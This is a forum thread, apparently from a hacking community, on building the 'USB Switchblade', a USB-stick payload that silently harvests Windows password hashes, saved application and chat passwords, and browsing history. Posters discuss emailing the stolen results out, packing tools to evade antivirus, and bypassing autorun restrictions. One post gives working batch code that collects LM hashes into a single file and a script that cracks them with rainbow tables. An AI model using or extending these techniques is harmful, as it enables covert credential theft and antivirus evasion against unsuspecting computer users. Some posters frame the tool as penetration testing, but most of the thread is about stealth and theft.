Jump to content

USB Switchblade Development


Darren Kitchen

Recommended Posts

Something that would be really interesting is having this work even if autorun is enabled, by exploiting the USB to either enable temporarily or just run this code. A lot of places are now preventing the autorun feature for fear of things like this. I'd be interested to see / help with that solution.

Link to comment
Share on other sites

  • Replies 581
  • Created
  • Last Reply

Top Posters In This Topic

I'd love to see it expanded so that it can email or somehow send the results to a user specified destination just for use in penetration testing. Leave a few USB sticks around a company and just wait for the users to pick them up and plug them in. Great example to convince companies to quit allowing their users administrative priviledges.

Either the U3 version or Amish's version would be satisfactory. Anyone know how to do that?

Link to comment
Share on other sites

File Sharing is enabled, and even with the firewall and anti-virus turned off I'm still getting the same errors. It seems to work great pulling all of my passwords from applications, but it wont even generate the hash to run against rainbow..

Perhaps there is no password on the admin acount. In that instance windows would force remote users to logon using the guesst acount.

Link to comment
Share on other sites

Hey man I feel famous LOL. Seriously thanks for the credit Darren. 8)

When I developed the first payload it was just a proof of concept put together in half an hour as soon as I found out how to replace the U3 iso. Anywaz since then I have written some more, and refined it a bit. I have also got a bolt on, that silently finds the local smtp server (or builds its own if directly connected) and emails the results.

So If you guys want to help develop it further I’m up for it. And if you need help getting it running then just ask :).

I also have a nun U3 version somthing like Amesh'e that I could add if you need it.

That would be great... would this be something that copies all the required files to the HD then emails from there? I'm thinking that so I won't have to be at the local computer any longer than needs be.

Link to comment
Share on other sites

nice, how do you ecrypt exe's ?

secret :X I dont give it out for fear of it becoming public and caught by avs. I WILL ENCRYPT THEM BUT I WONT GIVE OUT THE ENCRYPTER. Sorry. It would also allow any blackhat-wannabe to hack people. Im not going to let that happen.

Link to comment
Share on other sites

avast dont like it :(

and wiggs out

avastdontlikeit.png

what files? pleas email me at admin@vertex-hosting.net with the files it flags. I will encrypt them. I have encrypted pwdump.exe lsaext.dll and pwservice and they are hosted at http://brainkill.net/hack. Consult page for direct links.

Thanks

i think i can guess how :P

i'll do a quick check . that message was just emediately while dowloading (the on acces scanner)

but i'll disable it and maually test each file seperate and send u the results :wink:

Link to comment
Share on other sites

ok so here's avast's output and the warning/info/advice it gives

it gives following warnings with following files :

file : batexemailpv.exe[uPX]

Malware name : Win32:MailPassView [Tool]

Malware type : Other potentially dangerous program

VPS version : 0636-1, 06/09/2006

recommended action : move to chest

file : batexemspass.exe[uPX]

Malware name : Win32:Messen [Tool]

Malware type : Other potentially dangerous program

VPS version : 0636-1, 06/09/2006

recommended action : move to chest

Link to comment
Share on other sites

ok so here's avast's output and the warning/info/advice it gives

it gives following warnings with following files :

file : batexemailpv.exe[uPX]

Malware name : Win32:MailPassView [Tool]

Malware type : Other potentially dangerous program

VPS version : 0636-1, 06/09/2006

recommended action : move to chest

file : batexemspass.exe[uPX]

Malware name : Win32:Messen [Tool]

Malware type : Other potentially dangerous program

VPS version : 0636-1, 06/09/2006

recommended action : move to chest

I must have the original programs... before the were encrypted in UPX in order to encrypt them fully. Thanks

Link to comment
Share on other sites

Hey all,

The symantec anti virus auto-protect is showing up. I used brainkill's version of pwdump and pwservice.exe and LsaExt.dll. I have no problems with pwservice or pwdump, but LsaExt.dll is getting auto-quarenteened. Pspv.exe is getting nailed as well. The good news is that I god mspass.exe working and it logs chat user/pass combos in plaintext. I plan on adding outlook and other mail support as well. Any suggestions for LsaExt.dll and pspv.exe? TIA

Marla :zombie:

Link to comment
Share on other sites

I asked on Digg, but didn't get an answer so I am asking at the source.

Is there a particular reason why the U3 ISO image is being replaced with a custom ISO image?

Since the U3 launchpad is a real application (backed by big corporations so antivirus is much less likely to block it), which already has the ability to autolaunch an application registered to it, why not go that route? All it takes is the U3 developer API (available for free), some tweaking to an exe to behave as U3 expects, and packing it up as a U3 install file. To prevent easy tagging by antivirus, randomly pad the exe before creation the U3 install file. Since U3 always had the ability to load up from a local U3 install file, this is relatively easy to test.

I realize a lot of batch files are being used, but a simple exe to execute batch files shouldn't be a problem, right?

I don't see a clear advantage to using the custom ISO. Am I missing something?

Link to comment
Share on other sites

I was thinking that too. I like my skype! dammit! and sudoku. and trillian. and firefox. and thunderbird, etc

I like your idea

EDIT: It aslo seems lots cleaner to just use the original interface, with a package

Link to comment
Share on other sites

A small modification can be made that will allow someone to easily create a file of lm password hashes alongside the usual machine output.

The benefit? Well, lets say someone wanted to go to several computers, and wanted to grab a long list of passwords to crack in one fell swoop. Copying and pasting from all of the individual log files would be tedious to create an lm hash list, so why not create it on the fly?

edit your switchblade batch file so that at the bottom, you see this. Also, note that your switchblade file might not have the URL history, depending on the version you chose. Pay attention to the line that starts with TYPE.

... [continued from file] ...



Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

echo ***********[Dump URL History]******* >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

   cscript //nologo .DUH.vbs >> Documentslogfiles%computername%.log 2>&1

TYPE Documentslogfiles%computername%.log | find ":::" | find /V "NO PASSWORD" | find /V "HelpAssistant" >> Documentslogfilespwfile.txt

:End

exit

Pay special attention to the line that starts with TYPE. Lets go through it one by one.

TYPE Documentslogfiles%computername%.log

This will get the output we just created with switchblade, so we can work with it.

find ":::"

I noticed all of the lm hashes had three colons in their lines, which appeared no where else. Might aswell use that to our advantage!

find /V "NO PASSWORD" | find /V "HelpAssistant"

There's two types of lines that we don't want to see, ones that have no password to crack, and those that are of the Microsoft created account "HelpAssistant". If there's other search terms you don't want to see, you can add them also.

>> Documentslogfilespwfile.txt

This will create a password file if it doesnt exist. If it does exist, the password file will be appended to, so that you can rapidly gather passwords into one file for quick cracking.... which can be done with the next small code edit

Making rcrack one-click friendly

use notepad to create the following file, and save it as crack.bat or something with a batch extension. This will be saved on your cracking computer at home that contains your rainbow tables. Hopefully you don't bring those with you on your USB key!!! :o

@echo off

echo Starting crack, writing output to log.txt ...

echo   >> log.txt

echo ************************************ >> log.txt

echo Cracking started by %username% at %date% %time%  >> log.txt

rcrack.exe *.rt -f pwfile.txt >> log.txt

echo Cracking complete at %date% %time% >> log.txt

echo ************************************ >> log.txt

echo Success!

this batch file will process your password file you created, and output the status of it to log.txt in your cracking folder. This way you can leave your computer cracking unattended, and still be able to get the results later in an organized manner, with all of your passwords you gathered in one neat and convenient location.

Link to comment
Share on other sites

Since we are on the subject of "physical" access to someone's box and some utilities to use, why not use "Hirens Boot CD"? A very powerful, yet simple array of tools all tossed into a nice little neat package.

I know it's off subject and it's very "nubish" utility yet it works and has a bunch of great tools which I use on a daily basis. Although it doesn't crack the password and give you the hash, yet it will reset the password for you with a few keyboard strokes. Badda-bing Badda-boom your in the box with Administrator access.

I have not yet found a windows machine it doesn't work on. Only drawback would be that if someone has a CMOS/BIOS password on the box and you wouldn't be able to access the BIOS without providing a password or removing the battery to reset the BIOS back to default settings.

Just a thought...

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...